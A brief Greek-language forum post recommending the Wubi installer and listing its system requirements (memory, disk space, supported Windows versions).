    Αξίζει να το δοκιμάσετε.
     
    (το Wubi υπάρχει πάνω από ένα χρόνο, αλλά αρκετός κόσμος αγνοεί την ύπαρξη του...)


    Requirements

    256 MB memory

    5 GB harddisk space

    Windows 98, 2000, XP, Vista

     
     
×
×
  • Create New...